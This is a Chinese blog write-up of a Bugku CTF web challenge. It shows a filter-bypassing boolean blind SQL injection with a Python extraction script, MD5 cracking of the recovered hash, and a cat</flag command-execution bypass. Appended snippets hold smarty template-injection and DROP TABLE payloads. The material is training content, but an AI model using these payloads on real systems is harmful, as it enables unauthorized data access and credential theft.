bugku web 都过滤了

最新推荐文章于 2024-10-30 16:30:48 发布
最新推荐文章于 2024-10-30 16:30:48 发布
阅读量2.5k 收藏 21
点赞数 19
分类专栏: bugku ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_58189778/article/details/119793060
版权

题目:都过滤了

知识点:SQL注入、SQL注入绕过、命令执行绕过

工具:

解题:

确定题型:

点开链接:

是一个登录框,再查看源码,发现该界面除了登录指向一个php脚本外,其他连接都是无效的,所以此题的玄机应该就在登录这里。这种情况下,常见的是两种,一是弱口令爆破,二是SQL注入攻击,我没有尝试第一种,因为看了别人的提示确定了这是一个SQL注入(注意,网上有很多非SQL注入的解题,这些是因为早期这个题目不完善留下的漏洞,现在经过完善后应该就只有SQL注入能够解题)

找注入点:

开始尝试,先随便试一下用户名和密码:

尝试万能密码:

还尝试了#也不行,看来是有过滤,来看一下过滤了哪些字符(这里比较坑,题目给的提示不对),尝试几个比较重要的,发现#、--、or、and、空格被过滤了,-、()、’、”没有被过滤:

到这我们整理一下手头的信息,概括性地来看SQL注入攻击的话,注入点、payload、服务器的响应,这时三个重要的要素。这一题的注入点我感觉不会是http首部什么的,应该就是uname和passwd了(因为我的尝试不断有发现);payload的话有一些过滤我已经发现了,这个待会儿再说;倒是服务器的响应值得我们注意,目前得到的响应有三种,密码错、用户名错、检测到注入,我们挨个来看,密码错很明显就是admin用户是存在的,这就给我们这题提供了个方向,我们很可能就是要去拿到admin的密码,而用户名错显然就是用户不存在了,这里我们需要思考一下,既然服务器区别了用户不存在和密码错误这两种情况,那后端的SQL语句就不可能是一句 select * from user where username=用户名 and password=密码 这样的语句能够完成的了,必然还会有一句select  * from user where username=用户名 来检验用户名的存在与否,我们先来看看select * from user where username=用户名是不是存在注入呢?

没有报错,在意料之中,报错就太简单了,服务器相应响应是用户名错误(单双引号结果相同),那么这是否意味着单引号虽然没有被过滤但是被转义处理了,或者后端对sql语句错误的处理就是响应用户名错误呢?

我们继续试验,这里我们要尝试闭合引号:

先说说我们是怎么闭合引号的,既然注释符用不了,那我们就直接用引号闭合,能否闭合成功可以说明引号有没有被转义,有一个我以前跳过的坑说一下:

虽然mysql中两个字符串不需要连字符就可以拼接,但是他们中间是有一个单引号的,如果妄图在此处构造

uname=admin’&passwd=123和uname=admin’’&passwd=123来看两者的区别,这是不可取的。

看下面的的两个payload

 

这两个payload我跟大家解释一下,mysql中字符串和数字类型可以比较也可以做运算,但是在比较和运算之前,字符串都会被转化成0,这里的两个payload在后端可能就是:

select * from user where username=’admin’-0-’’;

减号的优先级高,’admin’-0-’’结果为0,实际上就是select * from user where username=0;而我刚刚说过,字符串与数字比较会变成0,那么username=0就是永真。我们得到的结果是密码错误,符合我们的预期。

select * from user where username=’admin’-’1-’’;

这个得到的响应用户名错误也符合我们的预期。

到现在我们可以确定了,单引号能够闭合uname这个参数存在SQL注入。

确定注入类型:

找到注入点后我们来确定一下注入类型,显然这时SQL盲注,上面我们实验的结果告诉我们,报错是不可能的报错的,这辈子都不可能报错的,数据库报错不回显,服务器端脚本也不提示,只有看看布尔注入和延时注入才可能做出来这样子。延时注入和布尔注入对于我来说差别不大,但是要看看一些函数有没有被过滤,经检验:mid、substr、ascii、ord等函数都没有被过滤,()也没有被过滤,但是很烦的是(,,)和(,)被过滤了,这会对使用mid、substr等函数造成极大影响,我又想到了正则表达式,不过很遗憾尝试之后发现regexp也被过滤了。但是天无绝人之路,我找到了mid的不常见用法:

mid(字符串 from 起始位置 for 长度)

空格不能用不要紧,我们用()分隔关键字和字符串就好

构造payload:

uname=admin'-(mid((passwd)from(1))='a')-'&passwd=123

这个payload我们可以通过返回的结果判断(mid((passwd)from(1))='a')是否为真,从而得到passwd的第一位,不过要说一句的是这里的passwd也是个人的猜测,对应密码的字段名也不一定是passwd,只能说很有可能,但是我们看到这里的结果是:

这就说明了passwd字段存在,因为不存在的话会报错,报错的结果是用户名不存在(如果这一题密码字段名出的刁钻一点,要有按往常SQL注入的步骤从数据库名到表名再到字段名)

走到这一步,突然想起来

mid(字符串 from 起始位置 for 长度)中的for是必须的,因为mid(字符串 from 起始位置)=left(字符串,起始位置),但是加上for之后,发现检测到注入,很明显,for被过滤了,走到这里我卡了很久,但是比较幸运看到了一个大佬的payload:
mid(REVERSE(MID((passwd)from(起始位置)))from(-1))

大家可以推演一下:

mid(REVERSE(MID((passwd)from(n)))from(-1))=mid((passwd)from(n)for1)

写个Python脚本:

# -*- coding: utf-8 -*-
import requests as rq

uname = {'uname': "admin'-(ascii(mid(REVERSE(mid((passwd)from({start})))from(-1))){operator}{value})-'"}
passwd = {'passwd': '123'}
url = "http://114.67.246.176:18609/login.php"


def bool_sql(col_min, col_max, ascii_min, ascii_max, url, injection, other_data, judge_string):
    session = rq.Session()
    value = ''
    injection_data = ''
    injection_param = ''
    for key, val in injection.items():
        injection_data = val
        injection_param = key
    for i in range(col_min, col_max):

        start = i
        injection_data_1 = injection_data.replace('{start}', str(start))
        injection_data_2 = injection_data.replace('{start}', str(start))
        lmax = ascii_max
        lmin = ascii_min
        while lmin <= lmax:
            injection_data1 = injection_data_1
            injection_data2 = injection_data_2
           
            ascii_mid = int((lmin + lmax) / 2)
            injection_data1 = injection_data1.replace('{value}', str(ascii_mid))
            injection_data2 = injection_data2.replace('{value}', str(ascii_mid))
            injection_data1 = injection_data1.replace('{operator}', '=')
            # print(injection_data1)
            data = {injection_param: injection_data1}
            data.update(other_data)
            html = session.post(url, data=data)
            if judge_string in html.text:
                break
            injection_data2 = injection_data2.replace('{operator}', '<')
            data = {injection_param: injection_data2}
            data.update(other_data)
            # print(injection_data2)
            html = session.post(url, data=data)
            # print(html.text)
            if judge_string in html.text:
                lmax = ascii_mid - 1
            else:
                lmin = ascii_mid + 1
        # print(ascii_mid)
        value += chr(ascii_mid)
    return value


print(bool_sql(1, 33, 1, 129, url, uname, passwd, "username error!!@_@"))

得到结果:

先试一下是不是flag

发现不是,还是要登录,这借用这个作为密码也不对,猜想到php常常对密码进行md5加密密处理后存储,MD5免费在线解密破解_MD5在线加密-SOMD5在线解密得到bugkuctf

登录

进入到命令执行界面

发现这里也有很多过滤,依照别人的提示,cat</flag得到了flag

 

这里可以去了解一下shell重定向,但是感觉知道重定向能找到flag也很偶然,要是flag换个文件名或者不是直接放在根目录下还真不好找。

Bugku WEB过滤
qq_41696858的博客
07-25 1002
这题呢,网上有很多解法,那都是这个题目没有完善之前的,现在来说已经修复的差不多了,像以前的直接/flag当然行不通,源码泄露啥的也被删了 严格来说,其实这是一道sql注入题 打开场景,啥提示没有,那就dirsearch扫一波,在一番查找过后,发现images文件夹下有一张图片,那就是作者给的提示,也就是不是数字开头的字符串在比较时会自动转成0 那么他的提示里0=0也就是永真,所以可以爆出所有的用户名 友情小tips:三个0异或不是1,而是0,不要想当然,这就是一个存粹的数学问题 最后一个式子给出了如何有条件
BugKu_WEB_(1)
young的博客
07-21 1133
BugKu平台练习wp
bugku-web-都过滤
qq_75121443的博客
04-18 482
这里几乎没有其他线索,现在能想到的有两种,SQL注入和爆破。别说,页面还挺帅,这里所有链接点都是假的。得到最终密码bugkuctf。可以用{}来代替空格作用。得到账号为admin。
BugkuWeb:都过滤
Pai_Space
07-26 393
BugkuWeb:都过滤
Bugku CTF_Web——都过滤
最新发布
weixin_71914594的博客
10-30 429
想到上一题也是账号admin提示密码错误。用shell重定向构造payload。password是bugkuctf。base64编码的/也被过滤了。账号应该还是admin。只有一个登录框可以用。其他功能界面都用不了。ls读半天读不到什么。
bugkuweb36 全都过滤了绝望吗?
EC_Carrot的博客
12-28 1348
进去是个登录界面,稍微按了按导航栏没什么用,猜测是注入! 输入用户admin密码任意,显示password错误 输入用户admin'密码任意,显示username错误 输入用户admin'#密码任意,发现给检测到入侵,那#用不了,试了试-和+也被过滤了 那这里就能看出是盲注了,放脚本: # -*- coding: utf-8 -*- import requests session = requests.Session() url="http://114.67.246.176:12012/login.php
Bugku_web_login3(关于有过滤的sql盲注)
silence1_的博客
09-01 668
Bugku_web_login3(SKCTF) 题目 题目链接:http://123.206.31.85:49167/ hint:基于布尔的SQL盲注 打开题目是一个登录框,先试试admin,admin,回显password error! 再试试admin’,admin,回显username does not exist 可见username是admin,再试试admin’# ,又回显pass...
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
Bugku web 聪明的php
weixin_49633310的博客
03-17 3122
Bugku web 聪明的php模板注入打开题目 模板注入 打开题目 得到提示,传递参数 随机传一个参数,得到源码 在这地方卡了挺久的,发现smarty是个模板,测试一下是不是模板注入 确实为smarty模板注入 常用payload {if phpinfo()}{/if} {if system('ls')}{/if} {if readfile('/flag')}{/if} {if show_source('/flag')}{/if} {if system('cat ../../../flag'
bugku web方向所有题解
kekefen01的博客
04-18 3322
第一题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空一行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类型 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
ctf-WEB-都过滤
god_001的博客
05-09 1237
题目地址:跳转提示 打开网址,看到一个登陆页面: 首先随便输入用户名和密码,发现只报错显示用户名错误,因此推出后端先判断用户名,可能使用sql语句:SELECT * FROM tab_name WHERE uname=... 发现'#','-- ',' ','or','and','/*'都被过滤了 尝试判断闭合,发现用户名无论是admin'还是admin",都没有其他报错,先预设是单引号闭合 输入用户名为a'-'0,密码123 发现结果显示密码错误 可推出,确实是单引号闭合 原.
Bugku-CTF之sql注入2 (全都tm过滤了绝望吗?)
weixin_30593443的博客
07-04 1220
Day 38 sql注入2 200 http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% ​ 本题要点:DS_Store源码泄露 用bp弱口令爆一波 没有结果~ 用御剑扫描后台 ...
WEB36,38:全都过滤了,你绝望吗(sql盲注)
y17861077326的博客
03-25 377
先验知识 sql运算符优先级中比较运算符低于加减运算符的, mysql,中 where 语句中的运算符,例如加减,= 都是弱类型运算,跟php一样会进行强制类型转换。 字符串进行加减运算时,有以下几种情况: ‘abc’+0 = 0 ‘a’ + 0 = 0 ‘123’ + 0 = 123 ‘-123a’+0 = -123 ‘-+123a’ + 0 = 0 ‘a123a’ + 0 =0 ’ ’ =0  空字符串也是转0 ‘abc’ + ‘aaa’ = 0 ‘abc’ + ‘123’ =
Bugku sql注入 基于布尔的SQL盲注 经典题where information过滤
m0_64180167的博客
10-16 1096
考核中遇到的题 爆出数据库 就完全不知道怎么做了这里拿到原题记录一下首先拿到登入界面我们来进行测试输入 admin 密码随便输入输入 admin123 密码随便输入发现了 这里admin是存在数据库中的 但是不存在就会回显不存在所以这里我们可以确定了 admin 是true的然后我们开始fuzz发现过滤了巨多。。。。。where information啥都是过滤然后我们一个一个绕过。
什么是DS_Store?DS_Store源码泄露/bugku-web36(全都过滤了绝望吗?)
qq_45655564的博客
05-28 1619
什么是DS_Store .DS_Store(英文全称 Desktop Services Store)是一种由苹果公司的Mac OS X操作系统所创造的隐藏文件,目的在于存贮目录的自定义属性,例如文件们的图标位置或者是背景色的选择。相当于 Windows 下的 desktop.ini。 DS_Store文件泄露 如果开发/设计人员将.DS_Store上传部署到线上环境,可能造成文件目录结构泄漏,特别是备份文件、源代码文件。 工具 源码地址:https://github.com/lijiejie/ds_
Bugku CTF web36(Web
ChaoYue_miku的博客
03-19 355
0、打开网页,查看题目描述 描  述:全都过滤了绝望吗? 根据描述,说明是盲注 1、编写python脚本,运行获取密码 import requests session = requests.Session() url="http://114.67.246.176:15649//login.php" flag='' for i in range(1,250): left=32 right=128 mid=(left+right)//2 .
bugku ctf sql注入2
qq_42777804的博客
08-08 3151
全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% 骑士 特别特别  绝望         输入什么都不行     直接 在网址后面 添加   flag  (老师指点)    敲回车 发现会多了个这个 哈哈哈   记事本打开    发现这不就是  flag  吗   如下  flag{sql_iNJEct_comMon3600!} 提交即可...
bugku sql注入2
rommel的博客
08-28 1448
sql注入2 190 http://120.24.86.145:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% 这题懵逼了好久,额 最后我就瞎试下 在网址后价格flag 就得到了。。。。。。。。。。。。。。 excuse me????
多次 - BugKuCTF(SQL注入绕过)
小水池
09-14 9304
登陆后发现页面没有啥信息,但是url地址栏?id=1 可能存在注入 id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入 ?id=1'or 1=1--+ 也报错,可能存在过滤 尝试双写绕过,?id=1'oorr 1=1--+ 返回正常 那如何检测哪些字符串被过滤了呢?新技能GET! 异或注入了解一下,两个条件相同(同真或同假)即为假 http://120....
bugku my frist sqli
10-10
"Bugku"似乎是一个编程术语的拼写错误,可能是想说"SQL injection"(SQL注入),这是一种常见的Web应用程序安全漏洞。当用户能够输入恶意SQL代码到数据库查询中,攻击者可以利用这个漏洞获取未经授权的数据、修改数据甚至控制整个系统。SQL注入通常发生在未对用户的输入进行适当验证和转义的应用程序中。 简单来说,当你在编写代码时,如果没有正确处理用户提供的SQL参数,比如直接将其插入查询而不做任何清理或过滤,就可能导致SQL注入。例如,假设有一个登录表单接受用户名和密码: ```python username = request.GET['username'] password = request.GET['password'] cursor.execute("SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'") ``` 在这个例子中,如果用户输入了恶意的SQL字符串(如`'; DROP TABLE users; --`),实际执行的查询将变得危险: ```sql SELECT * FROM users WHERE username = ''; DROP TABLE users; -- ``` 这将删除users表。正确的做法应该是使用参数化查询或预编译语句来防止这种情况。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值